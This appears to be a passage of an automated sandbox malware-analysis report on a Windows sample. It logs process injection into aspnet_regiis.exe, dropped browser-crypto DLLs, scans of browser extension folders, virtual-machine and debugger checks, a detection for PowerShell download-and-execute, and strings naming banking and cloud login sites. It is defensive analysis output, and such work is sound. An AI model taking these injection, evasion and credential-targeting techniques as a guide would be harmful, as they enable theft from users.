                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 4EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 5540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 6540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 6670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 8A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_02A0180D
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 831Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 1900Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI coverage: 9.1 %
                      Source: C:\Users\user\Desktop\file.exe TID: 3980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh3_2_02A10DDB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D38ED FindFirstFileExW,0_2_6D5D38ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A15FD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0BF4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A14CC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A1543D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0D5C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0B5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A09D1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A15B0B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0B93F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0CD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A15142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10FBA GetSystemInfo,wsprintfA,3_2_02A10FBA
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: CFBFHI.3.drBinary or memory string: global block list test formVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware-
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: CFBFHI.3.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: CFBFHI.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: CFBFHI.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: CFBFHI.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: CFBFHI.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: CFBFHI.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: CFBFHI.3.drBinary or memory string: discord.comVMware20,11696497155f
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: CFBFHI.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: CFBFHI.3.drBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: CFBFHI.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: CFBFHI.3.drBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: CFBFHI.3.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: CFBFHI.3.drBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: CFBFHI.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: CFBFHI.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<Q'2
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: CFBFHI.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: CFBFHI.3.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP$
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: CFBFHI.3.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: CFBFHI.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: CFBFHI.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-74533
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-74517
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75857
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D5D199C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A18950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A014AD mov eax, dword ptr fs:[00000030h]3_2_02A014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A014A2 mov eax, dword ptr fs:[00000030h]3_2_02A014A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0148A mov eax, dword ptr fs:[00000030h]3_2_02A0148A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18599 mov eax, dword ptr fs:[00000030h]3_2_02A18599
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1859A mov eax, dword ptr fs:[00000030h]3_2_02A1859A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D5010 GetProcessHeap,0_2_6D5D5010
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D5D199C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CD4D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D5CD4D7
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CDA02 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D5CDA02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02A1D016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A1D98C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2762E SetUnhandledExceptionFilter,3_2_02A2762E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CA9B66C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CA9B1F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC4AC62
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BABD0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,0_2_6D5BABD0
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000 value starts with: 4D5AJump to behavior
                      Searches for specific processes (likely to inject)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A124A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A1257F
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A00000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A01000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A30000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A3D000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C70000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C71000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29B5008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CDBC8 cpuid 0_2_6D5CDBC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_02A10DDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_02A2B2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_02A2B268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A29A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_02A253E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_02A2AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_02A2B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_02A2B1C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_02A2E6A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_02A2B623
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_02A2B494
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_02A2749C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2B580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2B5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___g